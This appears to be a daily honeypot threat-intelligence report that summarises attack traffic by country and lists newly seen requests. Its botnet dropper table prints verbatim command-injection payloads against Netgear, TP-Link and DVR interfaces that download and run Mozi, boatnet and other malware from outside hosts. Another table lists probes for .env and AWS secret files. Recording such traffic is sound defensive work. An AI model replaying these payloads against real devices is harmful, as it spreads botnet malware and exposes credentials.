Report: 2025-06-19

Author: Shoggoth Industries

Daily Report: 2025-06-19

Executive summary

Interaction report on the HTTP service of various honeypots around the world.

executive_summary

In today’s report, we detected 7 stage 1 IP address(es), linked to 7 dropper URL(s).

There are 30 new requests that have never been observed before (these were added to the monitored request database).

A total of 1079 requests were recorded during the day, originating from 7 different countries, with a peak of 278 requests coming from the US.

ot_simplified_report

Simplified report for medium-level interactions with honeypots that mimic industrial systems (website loading or interactions with the website). For more, contact us at social@shoggoth.industries.

| source_country | targeted_country |
| --- | --- |
| US | Dubai |
| US | Dubai |
| CN | Georgia |

botnet_dropper_behaviour

| remote_addr | request |
| --- | --- |
| 42.226.68.212 | `GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://42.226.68.212:40260/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0` |
| 104.167.221.114 | `POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F104.167.221.114%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbkdvr HTTP/1.1` |
| 141.98.11.83 | `GET /shell?rm arm7;wget http://94.26.90.251/arm7;chmod 777 arm7;./arm7 arm7 HTTP/1.1` |
| 103.208.231.153 | `27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0` |
| 144.172.100.214 | `POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20boatnet.arm7%3B%20wget%20http%3A%2F%2F160.187.246.30%2Fhiddenbin%2Fboatnet.arm7%3B%20chmod%20777%20%2A%3B%20.%2Fboatnet.arm7%20tbk HTTP/1.1` |
| 87.121.84.34 | `GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://45.125.66.79/x/tplink+-O-` |
| 45.135.194.34 | `GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%24%28killall%20-9%20mipsel%20mpsl%3B%28wget%20-O-%20http%3A%2F%2F14.103.145.202%2Frondo.sh%7C%7Cbusybox%20wget%20-O-%20http%3A%2F%2F14.103.145.202%2Frondo.sh%29%20%7C%20sh%20-s%20tplink%3B%29 HTTP/1.1` |

request

The requests listed here are those that have not yet been integrated into the request database.

| | number_of_occurence | request |
| --- | --- | --- |
| 105 | 2 | `GET /.env-pipenv HTTP/1.1` |
| 106 | 2 | `GET /.env-poetry HTTP/1.1` |
| 107 | 2 | `GET /.env.custom HTTP/1.1` |
| 109 | 2 | `GET /.aws/sts.yml HTTP/1.1` |
| 110 | 2 | `GET /.aws/.secret HTTP/1.1` |
| 111 | 2 | `GET /.env-hidden HTTP/1.1` |
| 112 | 2 | `GET /.env-health HTTP/1.1` |
| 113 | 2 | `GET /.env-hashed HTTP/1.1` |
| 114 | 2 | `GET /.env-filter HTTP/1.1` |
| 115 | 2 | `GET /.env-tokens HTTP/1.1` |
| 116 | 2 | `GET /.env-prisma HTTP/1.1` |
| 117 | 2 | `GET /.env-export HTTP/1.1` |
| 118 | 2 | `GET /.env-secure HTTP/1.1` |
| 119 | 2 | `GET /.env-traces HTTP/1.1` |
| 124 | 2 | `GET /.env-db.env HTTP/1.1` |
| 125 | 2 | `GET /.env-params HTTP/1.1` |
| 126 | 2 | `GET /.env-vitest HTTP/1.1` |
| 127 | 2 | `GET /.env-pepper HTTP/1.1` |
| 128 | 2 | `GET /.env-django HTTP/1.1` |
| 129 | 2 | `GET /.env.dev.js HTTP/1.1` |
| 132 | 2 | `GET /.env.heroku HTTP/1.1` |
| 133 | 2 | `GET /.env-paypal HTTP/1.1` |
| 134 | 2 | `GET /.env-devops HTTP/1.1` |
| 135 | 2 | `GET /.env-escape HTTP/1.1` |
| 163 | 2 | `GET /.env.deploy HTTP/1.1` |
| 164 | 2 | `GET /.env-openid HTTP/1.1` |
| 235 | 1 | `GET /odinhttpcall1750324532 HTTP/1.1` |
| 236 | 1 | `GET /OdinHttpCall1750324532 HTTP/1.1` |
| 237 | 1 | `GET /Odin/http/call1750324532 HTTP/1.1` |
| 368 | 1 | `GET /3478047979 HTTP/1.1` |

country_iso_code

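| | number_of_occurence | country_iso_code |
| --- | --- | --- |
| 0 | 278 | US |
| 1 | 110 | GB |
| 2 | 95 | DE |
| 3 | 95 | SG |
| 4 | 68 | JP |
| 5 | 67 | NL |
| 6 | 62 | CN |
| 7 | 48 | BG |
| 8 | 44 | SY |
| 9 | 29 | CA |
| 10 | 21 | NG |
| 11 | 18 | LT |
| 12 | 16 | PL |
| 13 | 12 | IN |
| 14 | 12 | CH |
| 15 | 12 | PH |
| 16 | 11 | AU |
| 17 | 8 | RU |
| 18 | 7 | GH |
| 19 | 7 | RO |
| 20 | 7 | VN |
| 21 | 6 | ZA |
| 22 | 6 | UA |
| 23 | 5 | KR |
| 24 | 5 | HK |
| 25 | 5 | BR |
| 26 | 4 | IL |
| 27 | 4 | BE |
| 28 | 3 | KZ |
| 29 | 3 | SC |
| 30 | 2 | KW |
| 31 | 2 | IE |
| 32 | 1 | AM |
| 33 | 1 | ES |
| 34 | 1 | ID |
| 35 | 1 | CZ |
| 36 | 1 | MX |
| 37 | 1 | IR |
| 38 | 1 | AO |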
